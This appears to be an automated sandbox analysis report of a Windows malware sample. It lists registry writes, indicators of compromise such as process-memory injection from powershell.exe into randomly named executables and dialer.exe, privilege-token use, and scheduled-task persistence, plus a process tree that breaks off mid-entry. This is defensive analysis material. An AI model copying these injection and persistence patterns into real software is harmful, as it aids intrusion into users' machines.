Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\inetcpl.cpl,-4312#immutable1 = "Internet Options"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\colorcpl.exe,-6#immutable1 = "Color Management"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\LogicalViewMode = "5"	Explorer.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Clients = 3a0000000000	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\0\NodeSlot = "6"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 0000000001000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "10"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\NodeSlot = "5"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList	msiexec.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "9"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\NodeSlot = "12"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\0 = 7c003100000000008458fb6111005075626c69630000660009000400efbe724a6fa88458fb612e000000630500000000010000000000000000003c0000000000a91c29005000750062006c0069006300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003600000016000000	Explorer.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\SyncCenter.dll,-3000#immutable1 = "Sync Center"	Explorer.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\NodeRuntime	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\SensorsCpl.dll,-1#immutable1 = "Location Settings"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings	Explorer.EXE

Suspicious behavior: AddClipboardFormatListener 3 IoCs

Processes:

Explorer.EXE

pid process

3384 Explorer.EXE
3384 Explorer.EXE
3384 Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exertjirqmr.y331.exedialer.exertjirqmr.y332.exepowershell.exedialer.exe

pid	process
972	powershell.exe
972	powershell.exe
972	powershell.exe
2672	powershell.exe
2672	powershell.exe
2672	powershell.exe
1464	powershell.exe
1464	powershell.exe
1464	powershell.exe
4432	rtjirqmr.y331.exe
4432	rtjirqmr.y331.exe
2552	dialer.exe
2552	dialer.exe
2552	dialer.exe
2552	dialer.exe
4936	rtjirqmr.y332.exe
1124	powershell.exe
1124	powershell.exe
1124	powershell.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4936	rtjirqmr.y332.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4936	rtjirqmr.y332.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3384 Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exepowershell.exertjirqmr.y332.exedialer.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	972	powershell.exe
Token: SeIncreaseQuotaPrivilege	972	powershell.exe
Token: SeSecurityPrivilege	972	powershell.exe
Token: SeTakeOwnershipPrivilege	972	powershell.exe
Token: SeLoadDriverPrivilege	972	powershell.exe
Token: SeSystemProfilePrivilege	972	powershell.exe
Token: SeSystemtimePrivilege	972	powershell.exe
Token: SeProfSingleProcessPrivilege	972	powershell.exe
Token: SeIncBasePriorityPrivilege	972	powershell.exe
Token: SeCreatePagefilePrivilege	972	powershell.exe
Token: SeBackupPrivilege	972	powershell.exe
Token: SeRestorePrivilege	972	powershell.exe
Token: SeShutdownPrivilege	972	powershell.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeSystemEnvironmentPrivilege	972	powershell.exe
Token: SeRemoteShutdownPrivilege	972	powershell.exe
Token: SeUndockPrivilege	972	powershell.exe
Token: SeManageVolumePrivilege	972	powershell.exe
Token: 33	972	powershell.exe
Token: 34	972	powershell.exe
Token: 35	972	powershell.exe
Token: 36	972	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	1028	tasklist.exe
Token: SeDebugPrivilege	3688	taskkill.exe
Token: SeDebugPrivilege	3784	tasklist.exe
Token: SeDebugPrivilege	5028	taskkill.exe
Token: SeDebugPrivilege	2692	tasklist.exe
Token: SeDebugPrivilege	2756	taskkill.exe
Token: SeDebugPrivilege	4360	tasklist.exe
Token: SeDebugPrivilege	4620	taskkill.exe
Token: SeDebugPrivilege	3256	tasklist.exe
Token: SeDebugPrivilege	2292	taskkill.exe
Token: SeDebugPrivilege	4972	tasklist.exe
Token: SeDebugPrivilege	4932	taskkill.exe
Token: SeDebugPrivilege	516	tasklist.exe
Token: SeDebugPrivilege	4672	taskkill.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeIncreaseQuotaPrivilege	1124	powershell.exe
Token: SeSecurityPrivilege	1124	powershell.exe
Token: SeTakeOwnershipPrivilege	1124	powershell.exe
Token: SeLoadDriverPrivilege	1124	powershell.exe
Token: SeSystemProfilePrivilege	1124	powershell.exe
Token: SeSystemtimePrivilege	1124	powershell.exe
Token: SeProfSingleProcessPrivilege	1124	powershell.exe
Token: SeIncBasePriorityPrivilege	1124	powershell.exe
Token: SeCreatePagefilePrivilege	1124	powershell.exe
Token: SeBackupPrivilege	1124	powershell.exe
Token: SeRestorePrivilege	1124	powershell.exe
Token: SeShutdownPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeSystemEnvironmentPrivilege	1124	powershell.exe
Token: SeRemoteShutdownPrivilege	1124	powershell.exe
Token: SeUndockPrivilege	1124	powershell.exe
Token: SeManageVolumePrivilege	1124	powershell.exe
Token: 33	1124	powershell.exe
Token: 34	1124	powershell.exe
Token: 35	1124	powershell.exe
Token: 36	1124	powershell.exe
Token: SeDebugPrivilege	4936	rtjirqmr.y332.exe
Token: SeDebugPrivilege	4412	dialer.exe
Token: SeShutdownPrivilege	2892	powercfg.exe
Token: SeCreatePagefilePrivilege	2892	powercfg.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

dwm.exeExplorer.EXE

pid	process
1016	dwm.exe
1016	dwm.exe
1016	dwm.exe
1016	dwm.exe
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
1016	dwm.exe
1016	dwm.exe
1016	dwm.exe
1016	dwm.exe
1016	dwm.exe
1016	dwm.exe
3384	Explorer.EXE
3384	Explorer.EXE
1016	dwm.exe
1016	dwm.exe
1016	dwm.exe
1016	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

Explorer.EXE

pid	process
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE

Suspicious use of SetWindowsHookEx 43 IoCs

Processes:

Explorer.EXE

pid	process
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE
3384	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exepowershell.exertjirqmr.y330.exertjirqmr.y333.execmd.execmd.execmd.execmd.exertjirqmr.y331.exe

description	pid	process	target process
PID 4412 wrote to memory of 972	4412	Launcher.exe	powershell.exe
PID 4412 wrote to memory of 972	4412	Launcher.exe	powershell.exe
PID 972 wrote to memory of 1692	972	powershell.exe	rtjirqmr.y330.exe
PID 972 wrote to memory of 1692	972	powershell.exe	rtjirqmr.y330.exe
PID 972 wrote to memory of 1692	972	powershell.exe	rtjirqmr.y330.exe
PID 972 wrote to memory of 4432	972	powershell.exe	rtjirqmr.y331.exe
PID 972 wrote to memory of 4432	972	powershell.exe	rtjirqmr.y331.exe
PID 972 wrote to memory of 4432	972	powershell.exe	rtjirqmr.y331.exe
PID 972 wrote to memory of 4936	972	powershell.exe	rtjirqmr.y332.exe
PID 972 wrote to memory of 4936	972	powershell.exe	rtjirqmr.y332.exe
PID 972 wrote to memory of 2580	972	powershell.exe	rtjirqmr.y333.exe
PID 972 wrote to memory of 2580	972	powershell.exe	rtjirqmr.y333.exe
PID 972 wrote to memory of 2580	972	powershell.exe	rtjirqmr.y333.exe
PID 1692 wrote to memory of 4528	1692	rtjirqmr.y330.exe	cmd.exe
PID 1692 wrote to memory of 4528	1692	rtjirqmr.y330.exe	cmd.exe
PID 2580 wrote to memory of 3548	2580	rtjirqmr.y333.exe	cmd.exe
PID 2580 wrote to memory of 3548	2580	rtjirqmr.y333.exe	cmd.exe
PID 3548 wrote to memory of 2660	3548	cmd.exe	where.exe
PID 3548 wrote to memory of 2660	3548	cmd.exe	where.exe
PID 4528 wrote to memory of 884	4528	cmd.exe	chcp.com
PID 4528 wrote to memory of 884	4528	cmd.exe	chcp.com
PID 3548 wrote to memory of 2672	3548	cmd.exe	powershell.exe
PID 3548 wrote to memory of 2672	3548	cmd.exe	powershell.exe
PID 4528 wrote to memory of 3860	4528	cmd.exe	findstr.exe
PID 4528 wrote to memory of 3860	4528	cmd.exe	findstr.exe
PID 4528 wrote to memory of 3584	4528	cmd.exe	findstr.exe
PID 4528 wrote to memory of 3584	4528	cmd.exe	findstr.exe
PID 4528 wrote to memory of 2000	4528	cmd.exe	findstr.exe
PID 4528 wrote to memory of 2000	4528	cmd.exe	findstr.exe
PID 4528 wrote to memory of 4252	4528	cmd.exe	schtasks.exe
PID 4528 wrote to memory of 4252	4528	cmd.exe	schtasks.exe
PID 4528 wrote to memory of 376	4528	cmd.exe	schtasks.exe
PID 4528 wrote to memory of 376	4528	cmd.exe	schtasks.exe
PID 4528 wrote to memory of 4500	4528	cmd.exe	cmd.exe
PID 4528 wrote to memory of 4500	4528	cmd.exe	cmd.exe
PID 4500 wrote to memory of 364	4500	cmd.exe	reg.exe
PID 4500 wrote to memory of 364	4500	cmd.exe	reg.exe
PID 4528 wrote to memory of 4704	4528	cmd.exe	cmd.exe
PID 4528 wrote to memory of 4704	4528	cmd.exe	cmd.exe
PID 4704 wrote to memory of 4688	4704	cmd.exe	reg.exe
PID 4704 wrote to memory of 4688	4704	cmd.exe	reg.exe
PID 4528 wrote to memory of 1464	4528	cmd.exe	powershell.exe
PID 4528 wrote to memory of 1464	4528	cmd.exe	powershell.exe
PID 4432 wrote to memory of 2552	4432	rtjirqmr.y331.exe	dialer.exe
PID 4432 wrote to memory of 2552	4432	rtjirqmr.y331.exe	dialer.exe
PID 4432 wrote to memory of 2552	4432	rtjirqmr.y331.exe	dialer.exe
PID 4432 wrote to memory of 2552	4432	rtjirqmr.y331.exe	dialer.exe
PID 4432 wrote to memory of 2552	4432	rtjirqmr.y331.exe	dialer.exe
PID 4528 wrote to memory of 1028	4528	cmd.exe	tasklist.exe
PID 4528 wrote to memory of 1028	4528	cmd.exe	tasklist.exe
PID 4528 wrote to memory of 216	4528	cmd.exe	find.exe
PID 4528 wrote to memory of 216	4528	cmd.exe	find.exe
PID 4528 wrote to memory of 3688	4528	cmd.exe	taskkill.exe
PID 4528 wrote to memory of 3688	4528	cmd.exe	taskkill.exe
PID 4528 wrote to memory of 3784	4528	cmd.exe	tasklist.exe
PID 4528 wrote to memory of 3784	4528	cmd.exe	tasklist.exe
PID 4528 wrote to memory of 424	4528	cmd.exe	find.exe
PID 4528 wrote to memory of 424	4528	cmd.exe	find.exe
PID 4528 wrote to memory of 5028	4528	cmd.exe	taskkill.exe
PID 4528 wrote to memory of 5028	4528	cmd.exe	taskkill.exe
PID 4528 wrote to memory of 2692	4528	cmd.exe	tasklist.exe
PID 4528 wrote to memory of 2692	4528	cmd.exe	tasklist.exe
PID 4528 wrote to memory of 2648	4528	cmd.exe	find.exe
PID 4528 wrote to memory of 2648	4528	cmd.exe	find.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:564

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:1016

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:648

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:736

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:912

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:492

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:636

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1052

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1160

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1256

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1328

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1488

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:3128

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1548

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1684

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1808

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1828

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1896

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1976

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1724

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2156

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2348

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2372

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2524

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2560

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2600

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2608

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2780

c:\windows\system32\svchost.exe
